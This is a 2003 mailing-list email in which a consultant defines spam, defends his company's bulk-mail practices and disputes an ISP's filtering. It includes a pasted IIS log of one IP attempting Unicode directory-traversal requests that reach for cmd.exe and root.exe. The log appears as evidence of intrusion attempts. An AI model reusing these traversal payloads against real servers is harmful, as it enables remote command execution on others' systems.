----- Original Message -----
Sent: Wednesday, October 22, 2003 6:12
PM
Subject: Re: [iMS] POST Problems
I need to have a more specific definition of SPAM. To me SPAM is defined
as bouncing email off of open relays, and for that reason, the
source server can not be identified. UCE on the other hand, uses mail servers
that identify were the email is coming from. We all know the negative impact
SPAMMING and UCE have on the organizations in terms of illegal threats,
relentless hackers, faxes and threatening phone calls.
DGo Pro's policy is to send all bulk email on a 100 % permission
basis. ALL remove requests are honored within a reasonable amount of time
(ASAP). Most importantly, SPAM and UCE have a reverse effect. If someone
sends bulk email for promotional purposes to thoose that have not solicited
it, the email negatively impacts the desired result. Instead of more sales of
IMS software, for example, less sales result.
When UCE and SPAMMING become illegal, and someone starts pointing at a
SPAMMER, we need to have a process to identify the SPAMMER. For
example, check out the following IIS log showing a UNICODE hack into
my IMS dev. server:
#Software: Microsoft Internet Information Services 5.0
#Version:
1.0
#Date: 2003-10-11 14:30:24
#Fields: time c-ip cs-method cs-uri-stem
sc-status
15:18:12 66.176.103.202 GET /scripts/root.exe 404
15:18:13
66.176.103.202 GET /MSADC/root.exe 404
15:18:16 66.176.103.202 GET
/c/winnt/system32/cmd.exe 404
15:18:18 66.176.103.202 GET
/d/winnt/system32/cmd.exe 404
15:18:20 66.176.103.202 GET
/scripts/..%5c../winnt/system32/cmd.exe 500
15:18:22 66.176.103.202 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
15:18:23
66.176.103.202 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
404
15:18:25 66.176.103.202 GET
/msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe
500
15:18:27 66.176.103.202 GET /scripts/..��../winnt/system32/cmd.exe
500
15:18:29 66.176.103.202 GET /scripts/winnt/system32/cmd.exe
404
15:18:30 66.176.103.202 GET /winnt/system32/cmd.exe 404
15:18:32
66.176.103.202 GET /winnt/system32/cmd.exe 404
15:18:34 66.176.103.202 GET
/scripts/..%5c../winnt/system32/cmd.exe 500
15:18:36 66.176.103.202 GET
/scripts/..%5c../winnt/system32/cmd.exe 500
15:18:38 66.176.103.202 GET
/scripts/..%5c../winnt/system32/cmd.exe 500
15:18:39 66.176.103.202 GET
/scripts/..%2f../winnt/system32/cmd.exe 500
As quoted from "Hacking Exposed" third edition, "an attacker can escape
the web root, and execute any command..... " If anyone wants the counter
measure, email me offline.
The point here is that 66.176.103.202 (if they are hacking, I would guess
they are SPAMMERS ALSO ) could have used my machine to SPAM.
If someone is going to say I am a SPAMMER (not saying that you are) , I
would appreciate the opportunity to defend myself. If Comcast has placed this
filter on my IMS dev. machines because someone says I am a SPAMMER, the
ethical thing to do is to investigate the incident first, then take
appropriate filter action. Comcast has not contacted me before placing the
filter on Sunday.
Regards,
DGo Pro & Consult
